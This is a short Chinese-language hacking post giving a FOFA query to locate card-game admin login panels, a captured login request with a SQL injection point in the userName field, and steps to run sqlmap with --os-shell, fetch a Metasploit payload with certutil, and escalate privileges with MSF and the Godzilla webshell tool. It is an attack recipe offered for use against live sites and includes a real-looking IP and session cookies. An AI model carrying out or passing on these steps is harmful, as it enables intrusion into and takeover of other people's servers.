直接上图
FOFA搜索词:body="棋牌后台管理系统" && title=="后台登录"
请求包
POST /Login/ValidateLogin HTTP/1.1
Host: 127.0.0.1:8001
Content-Length: 30
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://111.73.45.27:8001
Referer: http://111.73.45.27:8001/Login/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6
Cookie: Hm_lvt_8ee3ec23e73c6dcda2c7c9c489c151aa=1599407883; RYQIPAI=RYCacheKey=1&RYCacheKey_ETS=2020-09-07+00%3a28%3a17&VS=07a6f8746a60ecc3; ASP.NET_SessionId=udnrj5bxpuchvrf4fs4oute3; BT_PANEL_6=3a8e87d5-ad8a-4db2-9e57-c3a1684991e0._Tklm_sxRP6Gk0jcgXfEFwQVt9Y; Hm_lpvt_8ee3ec23e73c6dcda2c7c9c489c151aa=1599429027
Connection: close
userName=123*&password=321
使用方法
上方请求包内的请求头Host参数修改成你目标域名或IP:端口,然后直接扔sqlmap执行:
Sqlmap -r post.txt --os-shell
即可获取交互shell,然后我们用win自带的certutil.exe下载msf生成的shell即可提权。
提权小思路
使用MSF的UAC提权模块进行提权。
使用“哥斯拉”菜刀工具的小模块进行提权加用户组。
使用MSF工具的CVE漏洞模块进行提权。
注:经测试有些站点可直接拿system权限
关于和掌控安全撞文章事情不存在谁抄谁,毕竟漏洞总不能只有一个人能挖出来,所以看热闹的和掌控安全的老哥勿扰。
请注意时间
Hi
扫二维码|关注我们
云闲|剑青
侠骨|初心